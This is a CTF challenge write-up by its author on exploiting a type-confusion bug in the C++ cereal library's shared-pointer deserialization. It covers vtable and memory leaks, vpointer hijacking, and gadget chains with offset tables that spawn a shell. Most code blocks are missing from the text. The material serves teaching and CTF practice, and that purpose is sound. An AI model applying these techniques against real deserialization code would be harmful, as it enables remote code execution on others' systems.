Sharing is Caring: Arbitrary Code Execution for Breakfast
Binary exploitation in C++, gadget mania, and a new form of deserialization attack.
Breakfast is a CTF challenge I designed for CrewCTF 2025. With deserialization attacks being in vogue, I wanted to explore the topic in C++ and as a result, found an interesting niche bug in the cereal library. In this writeup, we'll revisit C++ internals and explore binary exploitation techniques beyond ROP. We’ll learn how even a properly written C++ program could be vulnerable to remote code execution through insecure deserialization.
In a future post, I will share a more detailed writeup on the research. But for now, let's have fun and focus on the challenge. :)
The Challenge
The CTF has ended, but the binaries are public! If you want to try solving it or want to follow along, you can grab the challenge distribution pack here!
- Name: Breakfast
- Solves: 11
- Difficulty: Easy-Medium?
- Description:
They say breakfast is the most important meal of the day. But sometimes you just need milk to avoid Confusing your favourite Type of cereal…
The code is short, but don't let that fool you. A lot of complexity is abstracted away by the cereal library.
The code first outputs the serialization of three types: Congee
, Toast
, and Fruit
. Then it enters a loop which deserializes input and prints the deserialized values.
Running it in the terminal:
C++ Internals Redux
To better understand the program and how the exploitation works, let's review some C++!
If you're familiar, you may want to skip ahead to the analysis.
What are shared pointers?
Shared pointers (std::shared_ptr
) are smart pointers in C++ that enable multiple pointers to manage the lifetime of a single object. They use reference counting to track how many shared pointers point to the same dynamically allocated resource. The object is automatically deleted when the last remaining shared_ptr
pointing to it is destroyed or reset. This provides automatic memory management while allowing shared ownership.
Key Point for Exploitation: Multiple shared pointers may share a single object. This often complicates serialization, and may lead to bugs if improperly implemented.
Example:
Output:
What are virtual tables?
A vtable (virtual table) is the mechanism that enables runtime polymorphism in C++.
Each virtual class (any class containing virtual functions) has one corresponding virtual table (vtable).
Example of how virtual classes, vtables, and overriding virtual functions is implemented. Credit: Pablo Arias
The vtable stores an array of virtual functions.
Each object of a virtual class holds a virtual pointer (vpointer) which points to the vtable they are instantiated with. The vpointer is a “hidden first member” and precedes other members.
When a virtual function is called, dynamic dispatch is carried out by looking up the vtable then jumping to a function at a hard-coded offset. In assembly, this could be seen as a double dereference.
For further reading, I recommend checking out: Understanding Virtual Tables in C++ by Pablo Arias and this StackOverflow Q&A.
Key Points for Exploitation: 1) If an attacker controls the vpointer, they can hijack control flow. 2) The vpointer is the first member of any object of a virtual class.
std::string
?
What is an We all know what a string is in programming, but what does C++'s std::string
look like?
If we dig into the source code, we see the (GCC) implementation is roughly equivalent to:
Ignoring short-string optimisation and other factors, an std::string
simply consists of three members: the buffer (a pointer to the actual characters), the size, and the capacity of the dynamically allocated memory.
This allows for a growable string, suitable for dynamic operations such as append, replace, and remove.
Key Point for Exploitation: If we control buffer
and can observe the string, we can achieve arbitrary memory read.
Analysis
Initial Analysis
First step: Understanding what we have, aka enumeration. What protections are in place? What attack primitives are available?
Protections are typically easy to check. Running checksec
, we see NX is enabled, which means shellcode is out of the question. PIE and, by default, ASLR are also enabled, so we'll want some kind of address leak to do anything useful.
Looking at the code, we see 3 classes deserialized.
Cereal supports serialization of std::shared_ptr
. But how are shared references handled?
Cereal's JSON format uses an id
key for shared pointers. If id
is greater than 2 << 30
(2147483648), then the object is new and memory should be allocated for it. Otherwise, the object was seen before and the old std::shared_ptr
should be copied.
For instance, here's a sample JSON cereal-isation containing shared references:
In the above code example, 2147483649 and 2147483650 refer to new objects with ID 1 and 2. Memory is dynamically allocated, and object data is deserialized. Afterwards, the deserializer encounters "id": 1
which refers to the first object. No new data is deserialized, and the first std::shared_ptr
is copied.
We've figured out how Cereal handles shared references, but how can we apply it to the challenge?
Well, what if we force a shared reference, even if the deserialized types are different?
Type Confusion Primitives
It turns out Cereal does not perform type checking on shared pointers. If the deserialization handles multiple types, we can abuse it for type confusion!
I'll share a deep-dive into the type confusion primitives in a future post. For now, it suffices to understand what primitives are available in this challenge and how to achieve those primitives.
Here are the types again, for reference:
And the primitives available:
If we deserialize a... | followed by a... | we get... | because we... |
---|---|---|---|
Toast | Fruit | Address Leak (ASLR Bypass) | leak the vtable |
Congee | Fruit | Arbitrary Memory Read | control string internals |
Congee | Toast | Control Flow Hijacking | control the vpointer |
If the table doesn't make sense, perhaps this diagram demonstrating an address leak will help:
The program thinks the memory at 0x4000
is a Fruit
, but surprise!— it's actually a Toast
. When Fruit::name
is printed, what's actually printed is the vtable entry of Toast
.
Together, these primitives are enough to obtain arbitrary code execution!
Exploitation
Great, we've found the chink in the armor. Now let's draft a plan of attack.
- Leak the VTable address. (
Toast
→Fruit
) We can use this to calculate the base address of the binary and offsets to other locations (e.g. GOT entries). This will be useful to bypass ASLR/PIE. - Leak a libc/libcpp address. (
Congee
→Fruit
) This allows us to calculate offsets to gadgets. - Find a heap address. (
Congee
→Fruit
) We'll need this address for the next step. - Hijack control flow to point to a crafted gadget chain. (
Congee
→Toast
) We'll use the 64 bytes available inCongee
to plant a fake vtable containing a gadget chain. When the virtual function is called, the chain is triggered.
Leaking the VTable
Leaking the vtable is rather straightforward. We simply set the id
of the Fruit
object to refer to the Toast
object. But wait— since Fruit
is a string, we should make sure the size is non-zero. Luckily, we can control the size using the spread
parameter.
To recap, by type-confusing Fruit
and controlling spread
, we map Toast
's vpointer to Fruit
's string buffer and Toast
's spread
parameter to Fruit
's string size.
When deserialized, t
and f
share the same object. When *f
is printed, it will dereference the string buffer (vpointer) and print the first entry of the vtable, which is Toast::eat
.
We can do a quick PoC with xxd
, which allows us to view nonprintable bytes. By changing the initial JSON's value1.ptr_wrapper.data.spread
and value2.ptr_wrapper.id
fields, we can induce the binary to spit out 8 weird bytes, which happen to be an address leak of 0x560864bd50c2
! (Hint: It's in little endian, so read the leaked number backwards.)
(Note: If an image ever looks too small, try clicking and zooming in on it.)
Arbitrary Memory Read!
Now that we have an address from the binary, we can continue on our warpath by leaking a libc address. We’ll use the Congee
→ Fruit
primitive which allows control over the properties of an std::string
and grants us arbitrary memory read!
We'll use the GOT entry of malloc
as the string buffer. GOT entries are a fixed relative offset in the binary, so we can calculate it using our earlier vtable leak. When the string is printed, the GOT entry will be dereferenced and the address of malloc
printed.
Finding the Heap Address
Why do we need a heap address?
During the final stage of type confusion, we will be controlling a malicious vpointer (not the vtable!). To actually get control flow hijacking, we want the vpointer to point to a vtable, which will be our custom-crafted payload placed among the 7 remaining quadwords of Congee
. Thus, we need a heap address to the chunk where Congee
will be allocated.
To get a heap address leak, we can use the same memory read primitive and target an address which contains a heap address. There are several approaches.
One way is to obtain the main arena, which can be found from libc offset
+0x203ac0
. This then necessitates a convoluted hunt for heap addresses through a sea of indirection.Alternatively, a simpler method I observed from submissions is to take advantage of the
cereal::base64::chars
string declared globally in the binary.By reading from this memory, we can leak the heap-allocated buffer of
cereal::base64::chars
.
For the sake of simplicity, we'll stick with the cereal::base64::chars
method.
Finding Congee's Address
By observation, Congee
’s address remains unchanged between iterations. This means if we know the address of Congee this iteration, we can reuse that address next iteration.
Interestingly, the offset of c
from the heap's base address is constant, and we can calculate it to be +0x131c0
… at least locally.
Finding Congee's Address: Less Hacky Method
Perhaps that seems too hacky or inelegant to some. What if the offset was random? That would likely be the case in a more complex C++ program, one with heaps of memory allocation and deallocation. In that case, I offer an alternative approach.
We can use the bytes in Congee
to store a canary/needle— some kind of fixed string or pattern. Using our leaked heap address as a reference, we'll perform a giant memory read (e.g. 0x1000
bytes) and look for the needle.
In the following code, we'll look for the fixed pattern ABCD
(0x41424344
) in Congee.
Arbitrary Code Execution (ACE) via Gadget Chains
We finally have enough information to get code execution! To do so, we will construct a gadget chain in Congee
and craft the payload such that the virtual function call t->eat()
will trigger the chain.
1) When toast->eat()
is called, the vtable is looked up. Due to type confusion, it actually uses a vpointer we control. 2) We control the vpointer to point to a vtable within the same Congee
payload. The vtable contains a gadget which is called.
Essentially, by controlling the vpointer and vtable, we control the virtual function being called. But how do we craft a malicious function? The answer lies in gadgets.
PCOP / JOP
Classic ROP gadgets end in ret
. Upon hitting the ret
, the Instruction Pointer is set to the next item on the stack. Hence, gadgets could be chained by writing a block of memory to the stack.
PCOP/JOP is similar, but end in different instructions.
- PCOP (Pure Call Oriented Programming): ends in
call SOMETHING
which directly jumps to the next gadget - JOP (Jump Oriented Programming): ends in a
jmp
/call
which jumps to a dispatcher, before jumping into a table of gadgets. The dispatcher's job is to increment a "gadget pointer" before jumping to the next gadget. 1
The advantage of PCOP/JOP is that they don't rely on the stack, preferring instructions such as mov
and call
over stack-based instructions such as pop
and ret
.
- ROP Gadget:
pop rax; ret
. - PCOP/JOP Gadget:
mov rax, [rdi+8]; call [rax+0x10]
Approach 1: libstdc++ & One-Gadget
Funnily enough, this was the first working solution I came up with— and it's also the shortest payload I've seen so far (4 quads!).
A One-Gadget is a gadget which pops a shell if certain conditions are met. We can find these gadgets using the one_gadget
tool.
Looks like we found 4 one-gadgets. Each gadget lists the offset along with the constraints required to successfully trigger a shell. But to satisfy the constraints, we should first understand the state of the registers at the moment the virtual function is called. This calls for some breakpoints!
Disassembly and registers upon reaching Toast::eat()
, reachable via b *main+1121; si
.
By navigating to Toast::eat()
, we notice the following interesting register states:
rax == rdi
: non-controllable, address of virtual object (&*t
)rdx
: controllable, first address to jump torsi == r13 == 0
Our attention then turns to fulfilling the one-gadget constraints. I decided to look for gadgets supporting the third one-gadget (offset 0xef4ce
) due to the relatively simple conditions: we just need rbx = r12 = 0
. We can hunt for gadgets with tools such as ROPgadget
or xgadget
. The gadgets we're looking for should:
- Overwrite (or provide some control over) the desired registers.
- The
call
instruction of each gadget should jump to a controllable location, such as an offset withinCongee
—call [rax+0x10]
. - We should also exclude gadgets relying on the stack. This means any gadget containing
pop
,leave
, andret
.2
Output of xgadget --reg-overwrite r12 --jop /usr/lib/x86_64-linux-gnu/libstdc++.so.6
. We found a useful mov r12, rsi
gadget which sets r12
to 0. Additionally, the gadget will go to [rax+0x10]
meaning we can place another gadget at the +0x10
offset to continue the chain.
After a while, we ended up with two simple gadgets from libstdc++
. Constructing the final payload is simply a matter of cooking congee with the right ingredients:
Congee Ingredients:
Offset | Value | Purpose |
---|---|---|
0x00 | address of Congee + 0x08 | vpointer, points to offset 0x08 |
0x08 | libstdcpp + 0xf0a0c | first gadget, mov r12, rsi; call qword ptr [rax+0x10]; |
0x10 | libstdcpp + 0xf5e83 | second gadget, mov rbx, rsi; ... call qword ptr [rax+0x18]; |
0x18 | libc + 0xef4ce | one-gadget, sweet sweet code execution! |
The gadget flow is extremely straightforward:
- VTable is at Congee address +
0x08
→ - gadget at
0x08
(setr12
to 0) → - gadget at
0x10
(setrbx
to 0) → - gadget at
0x18
(one-gadget ACE).
Putting it all together, we get ACE.
system("/bin/sh")
Gadget Chain
Approach 2: Credit: Adapted from @erge’s and @lolc4t’s solutions.
I'm sure this gadget chain feels closer to home for ROPpers. The chain works by setting rdi
to "/bin/sh"
and calling the system
function. Despite the need for 6 quads in Congee, I find the chain rather fascinating as it condenses multiple steps into 2 clever gadgets.
Another nice aspect about this chain is that it does not rely on too much register state, only rax
and rdi
are used. (The libstdc++ and one-gadget chain rely on rsi = 0
which may not always be the case.)
Congee Ingredients:
Offset | Value | Purpose |
---|---|---|
0x00 | address of Congee + 0x10 | vpointer |
0x08 | address of Congee + 0x18 | address of [system, binsh, gadget2] structure |
0x10 | libc + 0x1740b1 | first gadget, mov rax, [rdi+8]; call [rax+0x10] |
0x18 | system | sweet sweet code execution! |
0x20 | &"/bin/sh" | address of any /bin/sh string |
0x28 | libc + 0xa5688 | second gadget, mov rdi, [rax+8]; call [rax] |
Here's the call flow:
- VTable is at Congee address +
0x10
→ - gadget at
0x10
(setrax
to*(rdi+0x08)
, i.e. the second Congee entry, or in other words:rax = rax + 0x18
) → - gadget at
0x28
(setrdi
to"/bin/sh"
) → - gadget at
0x18
(system
ACE).
To make this gadget chain work, we require the system, binsh, and 0xa5688
gadget to be contiguous in memory. This is because after mov rax
in the first gadget, the subsequent assembly will call [rax+0x10]
, which triggers the second gadget to copy [rax+0x08]
before call [rax]
. Each entry in this relative +0x10
, +0x08
, and +0x00
structure has their unique role to play.
The order of the other gadgets don’t matter as much. Here’s one of the solves from the CTF community. Notice how the first gadget (libc + 0x1740b1
) is placed at the end of the Congee payload instead of at offset 0x10
.
Alternative solution by @lolc4t.
Conclusion
This was an interest challenge to make as it helped refresh my binary exploitation skills despite me sucking at pwn challenges. I was also happy that players came up with different solutions, challenging my biases on what makes a successful gadget chain.
Overall, this has been a fun experience exploring and exploiting a niche use case of C++ serialization libraries. I have a few variant challenges I might present in future CTFs. We'll see if they make it out.
Special thanks to thehackerscrew CTF team for hosting my CTF challenge and to the players who opened my mind by sharing their solves.
Solve Script
Flag
Footnotes
For further reading on JOP, I recommend reading this StackExchange answer: Security.SE: Concept of Jump-Oriented-Programming (JOP). It provides an excellent summary and brief history on ROP/JOP. ↩︎
We exclude stack-based gadgets to simplify the exploit, even if an attack with such gadgets may be possible. The reason for doing so is that we don’t have direct control over stack memory. We would need the help of gadgets to push/modify the stack. Even then, modifying the stack without fine-grained control potentially crashes the program. So we explore other alternatives first. ↩︎
Comments are back! Privacy-focused; without ads, bloatware 🤮, and trackers. Be one of the first to contribute to the discussion— before AI invades social media, world leaders declare war on guppies, and what little humanity left is lost to time.